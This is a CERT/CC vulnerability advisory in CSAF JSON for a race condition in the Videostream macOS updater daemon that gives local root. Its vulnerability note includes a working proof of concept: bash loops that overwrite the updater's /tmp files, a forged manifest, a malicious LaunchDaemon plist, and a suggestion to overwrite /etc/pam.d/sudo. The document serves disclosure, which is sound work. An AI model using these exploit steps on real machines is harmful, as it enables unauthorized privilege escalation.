{"document":{"acknowledgments":[{"urls":["https://kb.cert.org/vuls/id/757109#acknowledgements"]}],"category":"CERT/CC Vulnerability Note","csaf_version":"2.0","notes":[{"category":"summary","text":"### Overview\r\nGroupnotes Inc. Videostream Mac client installs a LaunchDaemon that runs with root privileges. The daemon is vulnerable to a race condition that allows for arbitrary file writes. A low privileged attacker can escalate privileges to root on affected systems.\r\n\r\n### Description\r\nEvery five hours the Videostream LaunchDaemon runs with root privileges to check for updates. During the download, it's possible to replace the update file as any user with a crafted tar archive. The LaunchDaemon process will extract the archive and replace any requested file on the system.\r\n\r\n### Impact\r\nAn attacker with low privilege access can overwrite arbitrary files on the affected system. This can be leveraged to escalate privileges to control the root account.\r\n\r\n### Solution\r\nThe CERT/CC is currently unaware of a practical solution to this problem.\r\n\r\n### Acknowledgements\r\nThank you to Dan Revah for reporting this issue.\r\n\r\nThis document was written by Kevin Stephens.","title":"Summary"},{"category":"legal_disclaimer","text":"THIS DOCUMENT IS PROVIDED ON AN 'AS IS' BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. ","title":"Legal Disclaimer"},{"category":"other","text":"CERT/CC Vulnerability Note is a limited advisory. It primarily identifies vendors impacted by the advisory and not specific products. We only support \"known_affected\" and \"known_not_affected\" status. Please consult the vendor's statements and advisory URL if provided by the vendor for more details ","title":"Limitations of Advisory"}],"publisher":{"category":"coordinator","contact_details":"Email: cert@cert.org, Phone: +1412 268 5800","issuing_authority":"CERT/CC under DHS/CISA https://www.cisa.gov/cybersecurity also see https://kb.cert.org/ ","name":"CERT/CC","namespace":"https://kb.cert.org/"},"references":[{"url":"https://certcc.github.io/certcc_disclosure_policy","summary":"CERT/CC vulnerability disclosure policy"},{"summary":"CERT/CC document released","category":"self","url":"https://kb.cert.org/vuls/id/757109"}],"title":"Groupnotes Inc. Videostream Mac client allows for privilege escalation to root account","tracking":{"current_release_date":"2023-08-28T15:15:33+00:00","generator":{"engine":{"name":"VINCE","version":"3.0.35"}},"id":"VU#757109","initial_release_date":"2023-08-28 15:15:33.499649+00:00","revision_history":[{"date":"2023-08-28T15:15:33+00:00","number":"1.20230828151533.1","summary":"Released on 2023-08-28T15:15:33+00:00"}],"status":"final","version":"1.20230828151533.1"}},"vulnerabilities":[{"title":"Description\r\nLocal Privilege Escalation to ROOT - TOCTOU vulnerability in VideoStream for macOS applications.","notes":[{"category":"summary","text":"Description\r\nLocal Privilege Escalation to ROOT - TOCTOU vulnerability in VideoStream for macOS applications. There's a \"LaunchDaemon\" (runs as root on macoOS) that is registered while VideoStream is installed that attempts to update VideoStream every 5 hours.\r\nExploit\r\nEvery 5 hours the LaunchDaemon updater runs and it's possible to use race-condition and overwrite the downloaded file as it writes it to the `/tmp` directory. Then VideoStream uses that file to extract files into the root directory \"/\". This means we can override any file as root.\r\n\r\nAn attacker could generate a `tar.gz` file that will contain the hierarchy and file it wants to add/overwrite.\r\n\r\nIt's possible to override `/etc/pam.d/sudo` or `/Library/LaunchDaemons/com.example.plist` to get privilege escalation.\r\n\r\nIn order to do that an attacker must override both the `manifest.json` file that is being downloaded and installed. In order for the installer script to download a file and install it - it looks up the \"manifest.json\" file and extract the latest version. If the latest version is greater it than downloads the file.\r\n\r\nBoth \"Manifest.json\" and the downloaded file are getting written into the `/tmp` directory. It's possible to use race-condition and run the script _before_ the files are written into the `/tmp` directory for the first time, then it will allow the attacker to continuously overwrite this files with the new content.\r\n\r\n\r\nAs the latest version is 0.5.1 we need to have a manifest version with a greater version - for example 0.5.3:\r\n\r\n{\r\nCurrentVersion: '0.5.3',\r\nurl: 'videostream_0.5.0.tar.gz'\r\n}\r\n\r\n\r\nBut we'll need to keep the same name for the URL so the CURL would be able to download the file to `/tmp` and overwrite it.\r\n\r\nAnother thing to notice is that the `manifest.json` file is written with his name as the PID of the updater script, which ofcourse changes on each run - so we'll need to extract the PID and use it to overwrite the file.\r\n\r\nIn order to exploit this the attacker need to:\r\n1. Create manifest.json file with above contents under `/tmp`\r\n2. Use the following script to continiously extract the Videostream updater PID and overwrite the manifest.json downloaded file with our malicious manifest.json\r\n```\r\n#!/bin/bash\r\n\r\necho '[+] Overriding manifest.json'\r\n\r\nwhile [ ! -f /Library/LaunchDaemons/com.example.proof.plist ]\r\ndo\r\npgrep -f Videostream.update | xargs -I {} cp manifest.json /tmp/{}\r\ndone\r\n\r\n```\r\n\r\nThis is the first script that needs to be used as part of the exploit. And it verifies that we've added `com.example.proof.plist` to the LaunchDaemons (proof for being able to run command as root)\r\n\r\n3. Create a `escalate.tar.gz` file with the following hierarchy:\r\n- Library\r\n- LaunchDaemons\r\n- com.example.proof.plist\r\n\r\nLibrary directory and inside a LaunchDaemons and inside a com.example.proof.plist file.\r\n\r\n4. The com.example.proof.plist file can have:\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\r\n<plist version=\"1.0\">\r\n<dict>\r\n<key>Label</key>\r\n<string>com.example.proof</string>\r\n<key>ProgramArguments</key>\r\n<array>\r\n<string>touch</string>\r\n<string>/tmp/proof</string>\r\n</array>\r\n<key>RunAtLoad</key>\r\n<true/>\r\n</dict>\r\n</plist>\r\n\r\nThis will run on next boot (in order to avoid next-boot LPE we could overwrite the /etc/pam.d/sudo instead) and create /tmp/proof file as root.\r\n\r\n5. Now after we've created the escalate.tar.gz compressed file and we ran the previous script in the background. We'll also need to run this script:\r\n\r\n```\r\n#!/bin/bash\r\n\r\necho '[+] Overriding the downloaded files...'\r\n\r\nwhile [ ! -f /Library/LaunchDaemons/com.example.proof.plist ]\r\ndo\r\ncp escalate.tar.gz /tmp/videostream_0.5.0.tar.gz\r\nsleep 0.01\r\ndone\r\n\r\necho '[+] Done.'\r\n```\r\n\r\nThis one also waits for `com.example.proof.plist` to be created and until then it overwrites the videostream_0.5.0.tar.gz file with the value of `escalate.tar.gz` which will then be used to extract under the `/` directory and will add the com.example.plist.com file.\r\n\r\nAgain, we could overwrite `/etc/pam.d/sudo` to gain LPE without rebooting.\r\nImpact\r\nLocal Privilege Escalation from regular user to root\r\nDiscovery\r\n1. Downloading from getvideostream.com the macOS application.\r\n2. Suspicious Package - Looking up what's getting installed from the `pkg` installer file.\r\n3. Looking at `/Library/LaunchDaemons/...` and seeing that it installs a LaunchDaemon\r\n4. Looking at the installed script and analyzing it and finding that it's writing to `/tmp` directory and we can write there first and seeing that it a TOCTOU vulnerabilty."}],"cve":"CVE-2023-25394","ids":[{"system_name":"CERT/CC V Identifier ","text":"VU#757109"}]}],"product_tree":{"branches":[]}}